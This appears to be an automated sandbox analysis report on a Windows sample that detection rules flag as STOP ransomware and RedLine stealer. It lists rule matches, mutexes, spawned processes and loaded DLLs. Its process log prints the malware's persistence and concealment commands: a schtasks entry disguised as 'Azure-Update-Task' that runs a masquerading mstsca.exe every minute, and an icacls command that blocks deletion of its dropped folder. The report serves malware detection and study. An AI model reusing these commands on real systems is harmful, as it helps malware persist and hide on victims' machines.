Source: 00000005.00000002.2201107197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000002.2201107197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001F.00000002.3619170404.0000000000950000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.1660077105.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000004.00000002.1660011852.0000000004577000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.1871352690.000000000084D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.1803890578.0000000004434000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Process Memory Space: UXNob1Dp32.exe PID: 4904, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: UXNob1Dp32.exe PID: 1020, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: UXNob1Dp32.exe PID: 2004, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: UXNob1Dp32.exe PID: 4904, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: UXNob1Dp32.exe PID: 3260, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: UXNob1Dp32.exe PID: 7220, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.spre.troj.spyw.evad.winEXE@44/1444@9/5

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

1_2_00411900

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 0_2_042647C6 CreateToolhelp32Snapshot,Module32First,

0_2_042647C6

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

1_2_0040D240

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

File created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Mutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --Admin	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: IsAutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: IsTask	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --ForNetRes	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: IsAutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: IsTask	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --Task	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --AutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --Service	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: X1P	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --Admin	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: runas	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: x2Q	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: x*P	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: C:\Windows\	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: D:\Windows\	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: 7P	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: %username%	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: F:\	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --Admin	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: IsAutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: IsTask	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --ForNetRes	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: IsAutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: IsTask	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --Task	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --AutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --Service	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: X1P	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --Admin	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: runas	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: x2Q	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: x*P	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: C:\Windows\	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: D:\Windows\	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: 7P	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: %username%	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: F:\	1_2_00419F90

Source: UXNob1Dp32.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: UXNob1Dp32.exe

Virustotal: Detection: 42%

Source: UXNob1Dp32.exe	String found in binary or memory: set-addPolicy
Source: UXNob1Dp32.exe	String found in binary or memory: id-cmc-addExtensions
Source: UXNob1Dp32.exe	String found in binary or memory: set-addPolicy
Source: UXNob1Dp32.exe	String found in binary or memory: id-cmc-addExtensions
Source: UXNob1Dp32.exe	String found in binary or memory: set-addPolicy
Source: UXNob1Dp32.exe	String found in binary or memory: id-cmc-addExtensions
Source: UXNob1Dp32.exe	String found in binary or memory: set-addPolicy
Source: UXNob1Dp32.exe	String found in binary or memory: id-cmc-addExtensions

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

File read: C:\Users\user\Desktop\UXNob1Dp32.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\UXNob1Dp32.exe "C:\Users\user\Desktop\UXNob1Dp32.exe"
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\Desktop\UXNob1Dp32.exe "C:\Users\user\Desktop\UXNob1Dp32.exe"
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\Desktop\UXNob1Dp32.exe "C:\Users\user\Desktop\UXNob1Dp32.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe --Task
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\Desktop\UXNob1Dp32.exe "C:\Users\user\Desktop\UXNob1Dp32.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe --Task
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe"
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe" --AutoStart
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe"
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe" --AutoStart
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe"
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe" --AutoStart
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe" --AutoStart
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\Desktop\UXNob1Dp32.exe "C:\Users\user\Desktop\UXNob1Dp32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831" /deny *S-1-1-0:(OI)(CI)(DE,DC)	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\Desktop\UXNob1Dp32.exe "C:\Users\user\Desktop\UXNob1Dp32.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\Desktop\UXNob1Dp32.exe "C:\Users\user\Desktop\UXNob1Dp32.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe --Task	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe"
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe" --AutoStart
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe"
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: ncryptsslp.dll	Jump to behavior
